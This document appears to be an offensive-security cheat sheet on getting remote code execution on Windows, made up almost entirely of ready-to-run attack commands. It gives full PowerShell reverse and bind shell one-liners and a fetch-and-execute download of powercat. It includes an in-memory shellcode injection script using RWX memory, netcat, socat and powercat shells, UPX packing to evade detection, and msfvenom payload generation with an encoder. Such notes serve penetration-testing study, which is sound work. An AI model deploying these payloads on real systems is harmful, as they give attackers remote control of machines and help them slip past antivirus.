
Windows Remote Code Execution

PowerShell

Encoded Payload

File reverse_shell_cleartext.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.11.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encode payload and copy it to clipboard

cat reverse_shell_cleartext.ps1 | iconv -t UTF-16LE | base64 -w 0 | cs

Execute payload from clipboard

powershell -enc $(vs)

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.11.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Unrestricted and XClipboard

Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

Install XClipboard

sudo apt install xclip

Alias the xclip commands to short names (cs = copy stdin to clipboard, vs = print clipboard contents).

alias "cs=xclip -selection clipboard"
alias "vs=xclip -o -selection clipboard"

In-memory payload injection script

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (an RWX allocation, which is what memory scanners key on)
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

# copy the buffer byte by byte into the allocated region
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

# start a thread at the buffer and keep the host process alive
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

Powercat

Create Environment

Windows machine

. .\powercat.ps1
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Kali machine

sudo apt install powercat
cat /usr/share/windows-resources/powercat/powercat.ps1

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe

Stand-Alone Payloads

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe -g > shell.ps1

.\shell.ps1

Encoded Payloads

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe -ge > encoded_shell.ps1
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0A...pAAoACgA=

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

powercat -l -p 443 -e cmd.exe

Netcat

Packed File

upx -9 nc.exe

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

nc -nv 192.168.11.130 443 -e cmd.exe

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

nc -nlvp 443 -e cmd.exe

Socat

Reverse Shell

Kali machine

socat -d -d TCP4-LISTEN:443 STDOUT

Windows machine

socat TCP4:192.168.11.130:443 EXEC:cmd.exe

Encrypted Bind Shell

Create certificate and key

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 999 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Windows machine

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:cmd.exe

Kali machine

sudo socat OPENSSL:192.168.11.130:443,verify=0

Remote desktop

rdesktop $ip -u Tester -p Pass
xfreerdp /f /u:Tester /p:<Pass> /v:192.168.0.101 /drive:D,/tmp

Build Windows Binary File

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
wine32 syncbreeze_exploit.exe

msfconsole multi handler

sudo msfconsole -x "use exploit/multi/handler; set RHOST ip; set PAYLOAD windows/shell_reverse_tcp; set LHOST tun0; exploit"
processing AutoRunScript 'post/windows/manage/migrate'

Nmap NSE Scripts Exploit

cd /usr/share/nmap/scripts
grep Exploits *.nse
nmap --script-help=clamav-exec.nse

PayloadsAllTheThings

Exploit Resources

Metasploit Framework

BeEF

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<badchars>"
msfvenom --list encoders